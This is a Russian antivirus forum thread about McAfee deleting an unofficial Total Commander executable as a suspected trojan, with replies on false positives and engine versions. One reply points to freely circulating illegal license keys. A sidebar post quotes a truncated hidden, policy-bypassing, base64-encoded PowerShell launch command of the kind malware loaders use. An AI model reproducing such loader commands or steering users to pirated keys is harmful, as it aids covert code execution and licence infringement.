Перейти к содержанию
Schlecht

McAfee убил тоталкоммандер

Recommended Posts

Schlecht

В общем, всё в сабже - McAfee Enterprise 8.5 обновился и "нашёл" трояна в totalcmd.exe (Generic.dx (Trojan)) ну и удалил его тут же на нескольких машинах, не связанных в сеть. Коммандер 6.0 Anniversary Edition, то ли бесплатный, то ли ломаный - регистрации при установке не просил. Файл 100% чистый - проверял каспером, да и раньше макафи не бухтел - а тут разом и только после обновления.

Вопрос - этот фолс могет быть результатом возможного взлома коммандера? Стоит ли слать образец в McAfee?

Спасибо.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
georgy_n

Schlecht,

раз не "чистый" TC, а чья-то сборка, все может быть; обычно сам "totalcmd.exe" не "ломают", обходясь ключами. Многие АВ в той или иной мере ругаются на плагины таких сборок, но только на плагины - не сам "totalcmd.exe". Скорее всего очередная PUP, а может и в самом деле фолс, отправьте файл в Virus_Research, хуже от этого же не будет ;-)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Mike
В общем, всё в сабже - McAfee Enterprise 8.5 обновился и "нашёл" трояна в totalcmd.exe

Вопрос - этот фолс могет быть результатом возможного взлома коммандера?

Стоит ли слать образец в McAfee?

В последнее время McAfee Virusscan Enterprise 8.5i начал активно ругаться на различные креки, кейгены и

" пропатченные" программы, поэтому Вашa проблема достаточно известна.

Лучше пользоваться оригинальным Total Commander, приобретя лицензию (софт ведь не дорогой),

или используя версию с "тремя кнопочками", ну а если есть желание использовать нелегальный продукт,

то найти в интернете wincmd.key, который на каждом углу валяется.

Проверьте, какая версия Virusscan у Вас установлена.

Актуальный сканмодуль - 5300.2777

Актуальная дефиниция - 5400.

В Вашем случае я не вижу смысла посылать этот файл McAfee.

успехов, mike

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
georgy_n

Mike

Раз в теме.. С McAfee не ясна позиция - офисные продукты давно используют 5300 движок, домашние - 5200, - даже в 2009-й линеке; в офисные уже внедрена технология Artemis, домашние- в пролете, а это, судя по AV-Comparatives, + ~ 15% детекта. Обидно как-то, давно уже, но McAfee был любимым продуктом

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Mike
Mike

офисные продукты давно используют 5300 движок, домашние - 5200, - даже в 2009-й линеке; в офисные уже внедрена технология Artemis, домашние- в пролете.

я с домашними McAfee продуктами не знаком.

считаю, что они НЕКОНКУРЕНТНОСПОСОБНЫЕ.

хотя НР, Аsus и другие стали в свои компьюторы предустанавливать какой–то из продуктов McAfee

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Иван
в офисные уже внедрена технология Artemis

только в смбишные и пока дофига проблем

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×